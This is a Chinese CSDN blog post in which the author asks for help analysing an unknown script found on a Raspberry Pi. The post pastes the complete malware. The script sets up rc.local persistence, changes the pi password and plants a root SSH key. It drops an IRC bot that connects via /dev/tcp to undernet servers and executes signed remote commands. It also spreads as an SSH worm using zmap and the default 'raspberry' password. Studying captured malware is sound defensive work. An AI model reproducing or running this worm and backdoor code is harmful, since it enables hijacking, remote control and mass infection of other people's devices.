linux病毒脚本分析

最新推荐文章于 2023-05-18 20:11:51 发布
最新推荐文章于 2023-05-18 20:11:51 发布
阅读量1.6k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzlyxzy/article/details/79120116
版权 
树莓派/opt下多个几个莫名其妙的脚本,并且给添加到了rc.local中开机自动执行。请大神们帮忙分析一下吧。其中suck***是调试程序的时候用到的,大家可以无视。感觉关键部分是最后sshpass -praspberry开始的几段。
#!/bin/bash
echo "Suck dick ........................................................................" > /home/xzy_dick
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then 
	NEWMYSELF=`mktemp -u 'XXXXXXXX'`
	sudo cp $MYSELF /opt/$NEWMYSELF
	sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
	sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
	sudo sh -c "echo 'exit 0' >> /etc/rc.local"
	sleep 1
	sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B"  >> /root/.ssh/authorized_keys

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

	arr[0]="ix1.undernet.org"
	arr[1]="ix2.undernet.org"
	arr[2]="Ashburn.Va.Us.UnderNet.org"
	arr[3]="Bucharest.RO.EU.Undernet.Org"
	arr[4]="Budapest.HU.EU.UnderNet.org"
	arr[5]="Chicago.IL.US.Undernet.org"
	rand=$[$RANDOM % 6]
	svr=${arr[$rand]}

	eval 'exec 3<>/dev/tcp/$svr/6667;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi

	echo $NICK

	eval 'printf "NICK $NICK\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi
	eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
		continue
	fi

	# Main loop
	while [ true ]; do
echo "suck  pussy ..................................................................."
		eval "read msg_in <&3;"

		if [[ ! "$?" -eq 0 ]] ; then
			break
		fi

		if  [[ "$msg_in" =~ "PING" ]] ; then
			printf "PONG %s\n" "${msg_in:5}";
			eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
			sleep 1
			eval 'printf "JOIN #biret\r\n" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
		elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
			privmsg_h=$(echo $msg_in| cut -d':' -f 3)
			privmsg_data=$(echo $msg_in| cut -d':' -f 4)
			privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)

			hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
			sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

			if [[ "$sign" == "$hash" ]] ; then
				CMD=`echo $privmsg_data | base64 -d -i`
				RES=`bash -c "$CMD" | base64 -w 0`
				eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
				if [[ ! "$?" -eq 0 ]] ; then
					break
				fi
			fi
		fi
	done
done
EOFMARKER

chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
	FILE=`mktemp`
	zmap -p 22 -o $FILE -n 100000
	killall ssh scp
	for IP in `cat $FILE`
	do
		sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
		sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
	done
	rm -rf $FILE
	sleep 10
done

fi

控制工程小朋友
关注
Linux:9个实用shell运维脚本
IT技术分享社区
03-28 3955
1、Dos攻击防范(自动屏蔽攻击IP)#!/bin/bash DATE=$(date+%d/%b/%Y:%H:%M) LOG_FILE=/usr/local/nginx/logs/demo2.access.log ABNORMAL_IP=$(tail-n5000$LOG_FILE|grep$DATE|awk'{a[$1]++}END{for(iina)i...
Linux下python版后门智能查杀脚本
11-13
这款查杀程序采用插件化实现,可以对新型的web后门添加自定义的查杀插件,现有的10余款插件已经能够查杀目前常见的大部分web后门,不过要注意的是现有的插件大多数都是查杀PHP后门的,asp及aspx不在覆盖范围,jsp的插件较少,因为当初写这个程序是为了解决linux下的webshell查杀问题。
linux基本防护 /病毒检测
Kaailiu的博客
04-08 1015
(1)修改SSH端口并禁止root登录、禁用密码登录 ## 修改端口,个人觉得作用并不明显,人家一个端口扫描立马能找到你服务器开启了哪些端口,我们还需要做更多的限制。 (2)对登陆的ip做白名单限制(iptables、/etc/hosts.allow、/etc/hosts.deny) 可以专门找两台机器作为堡垒机,其他机器做白名单后只能通过堡垒机登陆,将机房服务器的登陆进去的口子收紧; ...
linux 查杀sh脚本
xbcsu的博客
04-20 1057
Linux查找脚本的进程号
Linux木马查杀辅助脚本
Jaskzon的博客
05-22 758
#/bin/sh # # # Linux information gather # # # by thecastle <https://github.com/IIComing> # # . ############################################################ clear echo echo "#################...
linux core病毒挖矿病毒定时器(源码)
纳川的博客
05-10 593
#!/bin/sh /bin/ps axf -o "pid %cpu" | awk '{if($2>=90.0) print $1}' | while read procid do kill -9 $procid done zero=0 process=`ps aux | grep 'HbewXurEWNdeWNtj' | grep -v grep| wc -l` if [ "$process" -eq "$zero" ]; then if [ -f /tmp/core ] then /tm
感染Linux系统脚本程序的病毒技术介绍
03-04
Linux系统脚本程序的病毒技术】 Linux系统虽然以其稳定性、安全性著称,但并不意味着它完全不受病毒的侵扰。尤其是对于运行脚本语言如Shell的系统,病毒可以通过恶意的脚本来传播和感染。本文将详细介绍Linux系统...
Linux病毒研究与分析
Go With Heart的专栏
08-05 4432
前言: 在我们日常生活中早就对windows中的病毒习惯了,对付windows中的病毒。我们有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 随着网络的发展,很多企业痘使用了Linux操作系统,原因主要是Linux的安全性比较高,但是Linux也会感染病毒。本文会对Linux病毒原理和如何防范做初步的介绍。 一、 Linux病毒史 1996年:破解组织V
感染linux脚本程序技术
09-16
感染 Linux 脚本程序技术 在 Linux 系统中,感染是一种常见的安全威胁,它可以通过各种方式来传播和感染系统。今天,我们来讨论一种特殊的感染方式,即通过 Linux 脚本程序来进行感染。 什么是感染? 感染是指...
Linux防护工具clamav病毒库离线版
12-07
**Linux防护工具ClamAV与离线病毒库详解** ClamAV是一款开源的反病毒软件,主要用于Linux系统,提供强大的邮件服务器、文件服务器和其他网络服务的病毒扫描功能。这款工具以其跨平台性、免费和开源的特性,在IT行业...
linux 病毒virus(text 逆向、PLT\GOT HOOK)
weixin_34296641的博客
07-03 440
免责声明:源码仅供学习,非法使用与作者无关!!!源码仅供学习,非法使用与作者无关!!!源码仅供学习,非法使用与作者无关!!! 随机感染目录下所有 elf 文件: char *dirs[4] = {"/sbin", "/usr/sbin", "/bin", "/usr/bin" }; virus.c /* * 编译: * gcc -g -O0 -DANTIDEBUG -DINFECT_PLTGO...
恶意代码之LINUX病毒技术
qq_63179750的博客
04-25 693
恶意代码之LINUX病毒技术
linux】挖矿病毒nanominer伪装成python占用服务器GPU!本文带你分析并杀毒!
最新发布
weixin_43693967的博客
05-18 3172
linux中了伪装成python的挖矿病毒,可以看到root用户将GPU的核心跑满了每个占用都是100%,显存吃了6G多。本文详细记录了病毒的原理和查杀记录
[转载]看外国人在网络上的吐槽:为什么中文这么TM难?
shgaol的专栏
04-04 5426
<br />来源:http://bbs.huanqiu.com/thread-565906-1-1.html<br />中文标题:为什么中文这么TM难? <br />原文标题:Why Chinese Is So Damn Hard? (by David Moser) <br />作者:Beender     协作:<br />阅读:37222<br />评论:201<br />原文连接:http://pinyin.info/readings/texts/moser.html<br />翻译截止日期:2011
Linux中挖矿病毒清理通用思路
dayouzi的博客
04-19 3865
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
linux挖矿病毒分析
weixin_42915431的博客
12-21 2760
最近我的测试虚拟机中了挖矿病毒,有个奇怪的名为VP0eryom的进程,cpu占用率特别高,于是自己就折腾着分析,试着找出原因,下面是简单分析过程。
linux病毒分析
tz_gx的专栏
03-15 1183
场景:系统每天早上自动执行一个apache的进程,且占用大量CPU资源如下图 检查分析进程所在路径: 然而tmp目录已经被删除了,kill -9 28271 28251 删除进程了,第二天又会自动启动这个进程,感觉应该是中毒了 解决办法:检查服务器自动执行脚本目录: 发现cron.daily目录最近被修改过,找到里面新增的文件anacron删除即可 部分anacr
Linux系统下用shell脚本病毒感染其它linux脚本程序
C/C++攻城狮
09-12 3346
1.前言这篇文章算是通过学习网上其它几篇关于shell脚本病毒文章后自己写的学习心得,通过写这篇文章让自己能够加深理解一下相关知识。但是其实下面用到的shell脚本病毒的现实意义不大,但是对于理解病毒传播的机制有一定的作用,仅作为参考而已。2.脚本代码及感染步骤1)首先建立一个空文件,命名以.sh结尾,例如:virus.sh。然后打开该文件输入如下代码:#!/bin/bash #B:<+!a%C&t
linux分析病毒,关于Linux操作系统病毒的原型分析
weixin_39553352的博客
05-14 209
一、 介绍写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解病毒的基本工作原理。二、 ELF Infector (ELF文件感染器)为了制作病毒文件,我们需要一个ELF文件感染器,用于制造第一个带毒文件。对于ELF文件感染技术,在Silvio Cesa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值